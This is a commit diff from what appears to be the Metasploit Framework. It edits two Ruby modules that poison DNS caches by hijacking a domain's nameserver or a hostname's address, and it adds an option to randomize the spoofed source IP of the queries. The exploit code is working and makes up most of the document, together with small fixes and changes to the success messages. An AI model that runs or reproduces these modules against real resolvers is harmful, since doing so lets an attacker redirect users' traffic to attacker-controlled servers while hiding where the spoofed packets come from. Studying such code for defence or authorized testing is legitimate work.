Adds an option to randomize the source address of the queries as well as some cosmetic changes. The tuning code should be forwarding queries properly now.
git-svn-id: file:///home/svn/framework3/trunk@5602 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
9b56053974
commit
b4fc255a41
|
@ -43,6 +43,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
|
OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']),
|
||||||
OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
|
OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
|
||||||
OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']),
|
OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']),
|
||||||
OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]),
|
OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]),
|
||||||
|
@ -136,6 +137,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
|
||||||
def run
|
def run
|
||||||
target = rhost()
|
target = rhost()
|
||||||
source = Rex::Socket.source_address(target)
|
source = Rex::Socket.source_address(target)
|
||||||
|
saddr = datastore['SRCADDR']
|
||||||
sport = datastore['SRCPORT']
|
sport = datastore['SRCPORT']
|
||||||
domain = datastore['DOMAIN'] + '.'
|
domain = datastore['DOMAIN'] + '.'
|
||||||
newdns = datastore['NEWDNS']
|
newdns = datastore['NEWDNS']
|
||||||
|
@ -279,10 +281,15 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
|
||||||
|
|
||||||
req.rd = 1
|
req.rd = 1
|
||||||
|
|
||||||
|
src_ip = source
|
||||||
|
|
||||||
|
if(saddr == 'Random')
|
||||||
|
src_ip = Rex::Text.rand_text(4).unpack("C4").join(".")
|
||||||
|
end
|
||||||
|
|
||||||
buff = (
|
buff = (
|
||||||
Scruby::IP.new(
|
Scruby::IP.new(
|
||||||
#:src => barbs[0][:addr].to_s,
|
:src => src_ip,
|
||||||
:src => source,
|
|
||||||
:dst => target,
|
:dst => target,
|
||||||
:proto => 17
|
:proto => 17
|
||||||
)/Scruby::UDP.new(
|
)/Scruby::UDP.new(
|
||||||
|
@ -350,7 +357,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
|
||||||
answer = Resolv::DNS::Message.decode(answer)
|
answer = Resolv::DNS::Message.decode(answer)
|
||||||
answer.each_answer do |name, ttl, data|
|
answer.each_answer do |name, ttl, data|
|
||||||
if((name.to_s + ".") == domain and data.name.to_s == newdns)
|
if((name.to_s + ".") == domain and data.name.to_s == newdns)
|
||||||
print_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}")
|
print_status("Poisoning successful after #{queries} queries and #{responses} responses: #{domain} == #{newdns}")
|
||||||
srv_sock.close
|
srv_sock.close
|
||||||
disconnect_ip
|
disconnect_ip
|
||||||
return
|
return
|
||||||
|
@ -385,7 +392,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
|
||||||
|
|
||||||
times = []
|
times = []
|
||||||
|
|
||||||
hostname = Rex::Text.rand_text_alphanumeric(16) + domain
|
hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
|
||||||
|
|
||||||
sock = Rex::Socket.create_udp(
|
sock = Rex::Socket.create_udp(
|
||||||
'PeerHost' => server,
|
'PeerHost' => server,
|
||||||
|
@ -413,7 +420,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
|
||||||
times << [Time.now.to_f - q_beg_t, cnt]
|
times << [Time.now.to_f - q_beg_t, cnt]
|
||||||
cnt = 0
|
cnt = 0
|
||||||
|
|
||||||
hostname = Rex::Text.rand_text_alphanumeric(16) + domain
|
hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
|
||||||
|
|
||||||
Thread.critical = false
|
Thread.critical = false
|
||||||
|
|
||||||
|
|
|
@ -36,12 +36,14 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
|
OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']),
|
||||||
OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
|
OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
|
||||||
OptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']),
|
OptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']),
|
||||||
OptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']),
|
OptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']),
|
||||||
OptAddress.new('RECONS', [true, 'The nameserver used for reconnaissance', '208.67.222.222']),
|
OptAddress.new('RECONS', [true, 'The nameserver used for reconnaissance', '208.67.222.222']),
|
||||||
OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]),
|
OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]),
|
||||||
OptInt.new('TTL', [true, 'The TTL for the malicious host entry', 31337]),
|
OptInt.new('TTL', [true, 'The TTL for the malicious host entry', 31337]),
|
||||||
|
|
||||||
], self.class)
|
], self.class)
|
||||||
|
|
||||||
end
|
end
|
||||||
|
@ -49,7 +51,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
|
||||||
def auxiliary_commands
|
def auxiliary_commands
|
||||||
return {
|
return {
|
||||||
"check" => "Determine if the specified DNS server (RHOST) is vulnerable",
|
"check" => "Determine if the specified DNS server (RHOST) is vulnerable",
|
||||||
"racer" => "Determine the size of the window for the target server"
|
"racer" => "Determine the size of the window for the target server",
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -129,6 +131,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
|
||||||
def run
|
def run
|
||||||
target = rhost()
|
target = rhost()
|
||||||
source = Rex::Socket.source_address(target)
|
source = Rex::Socket.source_address(target)
|
||||||
|
saddr = datastore['SRCADDR']
|
||||||
sport = datastore['SRCPORT']
|
sport = datastore['SRCPORT']
|
||||||
hostname = datastore['HOSTNAME'] + '.'
|
hostname = datastore['HOSTNAME'] + '.'
|
||||||
address = datastore['NEWADDR']
|
address = datastore['NEWADDR']
|
||||||
|
@ -271,10 +274,15 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
|
||||||
|
|
||||||
req.rd = 1
|
req.rd = 1
|
||||||
|
|
||||||
|
src_ip = source
|
||||||
|
|
||||||
|
if(saddr == 'Random')
|
||||||
|
src_ip = Rex::Text.rand_text(4).unpack("C4").join(".")
|
||||||
|
end
|
||||||
|
|
||||||
buff = (
|
buff = (
|
||||||
Scruby::IP.new(
|
Scruby::IP.new(
|
||||||
#:src => barbs[0][:addr].to_s,
|
:src => src_ip,
|
||||||
:src => source,
|
|
||||||
:dst => target,
|
:dst => target,
|
||||||
:proto => 17
|
:proto => 17
|
||||||
)/Scruby::UDP.new(
|
)/Scruby::UDP.new(
|
||||||
|
@ -342,7 +350,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
|
||||||
answer = Resolv::DNS::Message.decode(answer)
|
answer = Resolv::DNS::Message.decode(answer)
|
||||||
answer.each_answer do |name, ttl, data|
|
answer.each_answer do |name, ttl, data|
|
||||||
if((name.to_s + ".") == hostname and data.address.to_s == address)
|
if((name.to_s + ".") == hostname and data.address.to_s == address)
|
||||||
print_status("Poisoning successful after #{queries} attempts: #{name} == #{address}")
|
print_status("Poisoning successful after #{queries} queries and #{responses} responses: #{name} == #{address}")
|
||||||
disconnect_ip
|
disconnect_ip
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
@ -374,7 +382,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
|
||||||
|
|
||||||
times = []
|
times = []
|
||||||
|
|
||||||
hostname = Rex::Text.rand_text_alphanumeric(16) + domain
|
hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
|
||||||
|
|
||||||
sock = Rex::Socket.create_udp(
|
sock = Rex::Socket.create_udp(
|
||||||
'PeerHost' => server,
|
'PeerHost' => server,
|
||||||
|
@ -402,7 +410,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
|
||||||
times << [Time.now.to_f - q_beg_t, cnt]
|
times << [Time.now.to_f - q_beg_t, cnt]
|
||||||
cnt = 0
|
cnt = 0
|
||||||
|
|
||||||
hostname = Rex::Text.rand_text_alphanumeric(16) + domain
|
hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
|
||||||
|
|
||||||
Thread.critical = false
|
Thread.critical = false
|
||||||
|
|
||||||
|
@ -454,6 +462,6 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
|
||||||
# XXX: We should subtract the timing from the target to us (calculated based on 0.50 of our non-recursive query times)
|
# XXX: We should subtract the timing from the target to us (calculated based on 0.50 of our non-recursive query times)
|
||||||
avg_count
|
avg_count
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue